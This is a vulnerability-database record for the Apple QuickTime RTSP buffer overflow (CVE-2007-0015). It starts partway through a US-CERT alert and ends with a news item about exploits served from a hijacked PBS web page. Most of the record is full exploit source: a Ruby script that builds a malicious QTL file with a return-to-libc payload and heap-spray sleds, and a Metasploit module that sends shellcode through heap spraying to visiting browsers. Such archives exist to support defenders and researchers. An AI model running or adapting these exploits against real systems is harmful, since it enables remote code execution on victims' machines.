system.\r\n\r\n\r\nIII. Solution\r\n\r\n We are currently unaware of a solution to this problem. Until a\r\n solution becomes available, the workarounds provided in US-CERT\r\n Vulnerability Note VU#442497 are strongly encouraged.\r\n\r\n <http://www.kb.cert.org/vuls/id/442497>\r\n\r\n\r\nIV. 
References\r\n\r\n * US-CERT Vulnerability Note VU#442497 -\r\n <http://www.kb.cert.org/vuls/id/442497>\r\n\r\n * Securing Your Web Browser -\r\n <http://www.us-cert.gov/reading_room/securing_browser/>\r\n\r\n * CVE-2007-0015 -\r\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0015>\r\n\r\n\r\n ____________________________________________________________________\r\n\r\n The most recent version of this document can be found at:\r\n\r\n <http://www.us-cert.gov/cas/techalerts/TA07-005A.html>\r\n ____________________________________________________________________\r\n\r\n Feedback can be directed to US-CERT Technical Staff. Please send\r\n email to <cert@cert.org> with "TA07-005A Feedback VU#442497" in the\r\n subject.\r\n ____________________________________________________________________\r\n\r\n For instructions on subscribing to or unsubscribing from this\r\n mailing list, visit <http://www.us-cert.gov/cas/signup.html>.\r\n ____________________________________________________________________\r\n\r\n Produced 2007 by US-CERT, a government organization.\r\n\r\n Terms of use:\r\n\r\n <http://www.us-cert.gov/legal.html>\r\n ____________________________________________________________________\r\n\r\n\r\nRevision History\r\n\r\n January 05, 2007: Initial release\r\n\r\n\r\n\r\n\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.2.1 (GNU/Linux)\r\n\r\niQEVAwUBRZ7D9OxOF3G+ig+rAQLG+Af/e+VhtMJEDuzVbT47HRdINgIRiOceCx4u\r\nDZFbMaUvYu4hjGu9f+T6AaGWR9FQj1ZzWDYf/JHY67NCSkwJdFY4Th1vR09BXJGy\r\nlmAzlj7+l3U4UeR+rEud0ajP8qCO7vwRGP4rPUVkcqgaBXqdyfgQbNHtwIpw6w/z\r\neFYyUp/2EA1vHeTGdPNAkQTupuC95kA0QsiONCVv9xTqg7xnlcXBTwKz+T/DcWig\r\nLDLgPMupim8+ruhkzCCOVveIFQPBdXN5Aem/Fvpmhi2V5HRBc65vKaDoLzBpt4BZ\r\nWdbeud6ljPjm0JLPvy84Gn7qFcjCu3WP3Nayd7rhbClFZSWyGilM+Q==\r\n=RrHt\r\n-----END PGP SIGNATURE-----", "edition": 1, "cvss3": {}, "published": "2007-01-06T00:00:00", "title": "US-CERT Technical Cyber Security Alert TA07-005A -- Apple QuickTime RTSP Buffer Overflow", "type": 
"securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2007-0015"], "modified": "2007-01-06T00:00:00", "id": "SECURITYVULNS:DOC:15611", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:15611", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:24:06", "description": "", "cvss3": {}, "published": "2007-01-04T00:00:00", "type": "packetstorm", "title": "MOAB-01-01-2007.rb.txt", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2007-0015"], "modified": "2007-01-04T00:00:00", "id": "PACKETSTORM:53412", "href": "https://packetstormsecurity.com/files/53412/MOAB-01-01-2007.rb.txt.html", "sourceData": "` \n#!/usr/bin/ruby \n# Copyright (c) LMH <lmh [at] info-pull.com> \n# Kevin Finisterre <kf_lists [at] digitalmunition.com> \n# \n# Notes: \n# Our command string is loaded on memory at a static address normally, \n# but this depends on execution method and the string length. The address set in this exploit will \n# be likely successful if we open the resulting QTL file directly, without having an \n# instance of Quicktime running. Although, when using another method and string, you'll need \n# to find the address. \n# For 100% reliable exploitation you can always use the /bin/sh address, \n# but that's not as a cool as having your box welcoming the new year. \n# Do whatever you prefer. That said, enjoy. \n# \n# see http://projects.info-pull.com/moab/MOAB-01-01-2007.html \n \n# Command string: Use whatever you like. \n# Remember that changing this will also need a change of the target address for system(), \n# unless string length is the same. 
\nCMD_STRING = \"/usr/bin/say Happy new year shit bag\" \n \n# Mac OS X 10.4.8 (8L2127) \nEBP_ADDR = 0xdeadbabe \nSYSTEM_ADDR = 0x90046c30 # NX Wars: The Libc Strikes Back \nSETUID_ADDR = 0x900334f0 \nCURL_ADDR = 0x916c24bc # /usr/bin/curl \nSHELL_ADDR = 0x918bef3a # /bin/sh \nCMDSTR_ADDR = [ \nSHELL_ADDR, # 0 addr to static /bin/sh (lame) \n0x017a053c, # 1 addr to our command string (cool) :> (change as necessary) \n0xbabeface, # 2 bogus addr for testing. \nCURL_ADDR # 3 addr to '/usr/bin/curl' \n] \n \n# Payload. default to CMDSTR_ADDR 0 (/bin/sh) \nHAPPY = (\"A\" * 299) + \n[EBP_ADDR].pack(\"V\") + \n[SYSTEM_ADDR].pack(\"V\") + \n[SETUID_ADDR].pack(\"V\") + \n[CMDSTR_ADDR[0]].pack(\"V\") # change array index for using diff. addr (see CMDSTR_ADDR) \n \n# Sleds: not necessary if using /bin/bash addr or other built-in addresses. \n# although, for using our own fu, we need to spray some data for better reliability \n# the goal is causing allocation of large heap chunks \nNEW = (\"\\x90\" * 30000) + CMD_STRING # feed the heap \nYEAR = (\"\\x90\" * 30000) + CMD_STRING # go johnny, go \nAPPLE = (\"\\x90\" * 30000) + \"EOOM\" # feed the heap more \nBOYZ = (\"\\x90\" * 30000) + \"FOOM\" # and more \n \n# QTL output template \nQTL_CONTENT = \"<?xml version=\\\"1.0\\\"?>\" + \n\"<?quicktime type=\\\"application/x-quicktime-media-link\\\"?>\" + \n\"<embed autoplay=\\\"true\\\" moviename=\\\"#{NEW}\\\" \" + \n\"qtnext=\\\"#{YEAR}\\\" type=\\\"video/quicktime#{APPLE}\\\" \" + \n\"src=\\\"rtsp://#{BOYZ}:#{HAPPY}\\\" />\\n\" \n \ntarget_file = File.open(\"pwnage.qtl\", \"w+\") { |f| \nf.print(QTL_CONTENT) \nf.close \n} \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/53412/MOAB-01-01-2007.rb.txt", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-12-05T22:24:39", "description": "", "cvss3": {}, "published": "2009-11-26T00:00:00", "type": "packetstorm", "title": "Apple QuickTime 7.1.3 RTSP 
URI Buffer Overflow", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2007-0015"], "modified": "2009-11-26T00:00:00", "id": "PACKETSTORM:82966", "href": "https://packetstormsecurity.com/files/82966/Apple-QuickTime-7.1.3-RTSP-URI-Buffer-Overflow.html", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::HttpServer::HTML \n \ninclude Msf::Exploit::Remote::BrowserAutopwn \nautopwn_info({ \n:os_name => OperatingSystems::WINDOWS, \n:javascript => true, \n:rank => NormalRanking, # reliable memory corruption \n:vuln_test => nil, \n}) \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Apple QuickTime 7.1.3 RTSP URI Buffer Overflow', \n'Description' => %q{ \nThis module exploits a buffer overflow in Apple QuickTime \n7.1.3. This module was inspired by MOAB-01-01-2007. The \nBrowser target for this module was tested against IE 6 and \nFirefox 1.5.0.3 on Windows XP SP0/2; Firefox 3 blacklists the \nQuickTime plugin. 
\n}, \n'Author' => [ 'MC', 'egypt' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision$', \n'References' => \n[ \n[ 'CVE', '2007-0015' ], \n[ 'OSVDB', '31023'], \n[ 'BID', '21829' ], \n[ 'URL', 'http://projects.info-pull.com/moab/MOAB-01-01-2007.html' ], \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n}, \n'Payload' => \n{ \n'Space' => 500, \n'BadChars' => \"\\x00\\x09\\x0a\\x0d\\x20\\x22\\x25\\x26\\x27\\x2b\\x2f\\x3a\\x3c\\x3e\\x3f\\x40\\x5c\", \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Automatic', { } ], \n[ 'Apple QuickTime Player 7.1.3', \n{ \n'Ret' => 0x6855d8a2 # xpsp2/2k3 :( | vista ;) \n} \n], \n[ 'Browser Universal', \n{ \n'Ret' => 0x0c0c0c0c # tested on xpsp0 and sp2 \n} \n], \n], \n'Privileged' => false, \n'DisclosureDate' => 'Jan 1 2007', \n'DefaultTarget' => 0)) \nend \n \ndef on_request_uri(client, request) \n \nreturn if ((p = regenerate_payload(client)) == nil) \n \nif (target.name =~ /Automatic/) \nif (request['User-Agent'] =~ /QuickTime/i) \ntarget = targets[1] \nelse \ntarget = targets[2] \nend \nend \n \ncruft = rand_text_alphanumeric(4) \n# This is all basically filler on the browser target because we can't \n# expect the SEH to be in a reliable place across multiple browsers. \n# Heap spray ftw. \nsploit = rand_text_english(307) \nsploit << p.encoded + \"\\xeb\\x06\" + rand_text_english(2) \nsploit << [target.ret].pack('V') + [0xe8, -485].pack('CV') \n \nif (request['User-Agent'] =~ /QuickTime/i or request.uri =~ /.qtl$/) \nprint_status(\"Sending #{self.name} exploit to #{client.peerhost}:#{client.peerport}...\") \nprint_status(\"Trying target #{target.name}...\") \ncontent = build_qtl(sploit) \nelse \nprint_status(\"Sending #{self.name} init HTML to #{client.peerhost}:#{client.peerport}...\") \n \nshellcode = Rex::Text.to_unescape(p.encoded) \nurl = ((datastore['SSL']) ? \"https://\" : \"http://\") \nurl << ((datastore['SRVHOST'] == '0.0.0.0') ? 
Rex::Socket.source_address(client.peerhost) : datastore['SRVHOST']) \nurl << \":\" + datastore['SRVPORT'] \nurl << get_resource \njs = <<-ENDJS \n#{js_heap_spray} \nsprayHeap(unescape(\"#{shellcode}\"), 0x#{target.ret.to_s 16}, 0x4000); \nENDJS \ncontent = \"<html><body><script><!--\\n#{js}//--></script>\" \ncontent << <<-ENDEMBED \n<OBJECT \nCLASSID=\"clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B\" \nWIDTH=\"1\" \nHEIGHT=\"1\" \nCODEBASE=\"http://www.apple.com/qtactivex/qtplugin.cab\"> \n<PARAM name=\"SRC\" VALUE = \"#{url}/#{cruft}.qtl\"> \n<PARAM name=\"QTSRC\" VALUE = \"#{url}/#{cruft}.qtl\"> \n<PARAM name=\"AUTOPLAY\" VALUE = \"true\" > \n<PARAM name=\"TYPE\" VALUE = \"video/quicktime\" > \n<PARAM name=\"TARGET\" VALUE = \"myself\" > \n<EMBED \nSRC = \"#{url}/#{cruft}.qtl\" \nQTSRC = \"#{url}/#{cruft}.qtl\" \nTARGET = \"myself\" \nWIDTH = \"1\" \nHEIGHT = \"1\" \nAUTOPLAY = \"true\" \nPLUGIN = \"quicktimeplugin\" \nTYPE = \"video/quicktime\" \nCACHE = \"false\" \nPLUGINSPAGE= \"http://www.apple.com/quicktime/download/\" > \n</EMBED> \n</OBJECT> \nENDEMBED \ncontent << \"</body></html>\" \nend \n \nsend_response(client, content, { 'Content-Type' => \"text/html\" }) \n \n# Handle the payload \nhandler(client) \nend \n \ndef build_qtl(overflow) \ncruft = rand_text_english(4) \n \ncontent = \"<?xml version=\\\"1.0\\\"?>\\n\" \ncontent << \"<?quicktime type=\\\"application/x-quicktime-media-link\\\"?>\\n\" \ncontent << \"<embed autoplay=\\\"true\\\" \\n\" \ncontent << \"moviename=\\\"#{cruft}\\\" \\n\" \ncontent << \"qtnext=\\\"#{cruft}\\\" \\n\" \ncontent << \"type=\\\"video/quicktime\\\" \\n\" \ncontent << \"src=\\\"rtsp://#{cruft}:#{overflow}\\\" />\\n\" \n \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/82966/apple_quicktime_rtsp.rb.txt", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "threatpost": [{"lastseen": "2018-10-06T23:09:35", "description": 
"Some sections of the popular PBS.org Web site have been hijacked by hackers serving up a cocktail of dangerous exploits.\n\nAccording to researchers at Purewire, attempts to access certain PBS Web site pages yielded JavaScript that serves exploits from a malicious domain via an iframe.\n\nThe malicious JavaScript was found on the \u201cCurious George\u201d page that provides content on the popular animation series.\n\nA look at the code on the hijacked site shows malicious activity coming from a third-party .info domain.\n\nThe URL serves exploits that target a variety of software vulnerabilities, including those in Acrobat Reader ([CVE-2008-2992](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2008-2992>), [CVE-2009-0927](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0927>), and [CVE-2007-5659](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5659>)), AOL Radio AmpX ([CVE-2007-6250](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6250>)), AOL SuperBuddy ([CVE-2006-5820](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5820>)) and Apple QuickTime ([CVE-2007-0015](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0015>)).\n\nPurewire said the exploit site is part of a malware campaign that includes tens of similar Web sites hosted off of a handful of common IP addresses.\n\nRead [the Purewire blog for more information](<http://blog.purewire.com/bid/20389/PBS-Website-Compromised-Used-to-Serve-Exploits>) on this attack.\n\nA representative for PBS.org tells me the malicious code has been removed from the site.\n", "cvss3": {}, "published": "2009-09-23T22:41:03", "type": "threatpost", "title": "PBS Website Compromised, Used to Serve Exploits", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2006-5820", "CVE-2007-0015", "CVE-2007-5659", "CVE-2007-6250", "CVE-2008-2992", "CVE-2009-0927"], "modified": "2013-04-17T16:39:50", "id": 
"THREATPOST:EF67C4CADC97C245A3B46788F85E3A8A", "href": "https://threatpost.com/pbs-website-compromised-used-serve-exploits-092309/72217/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}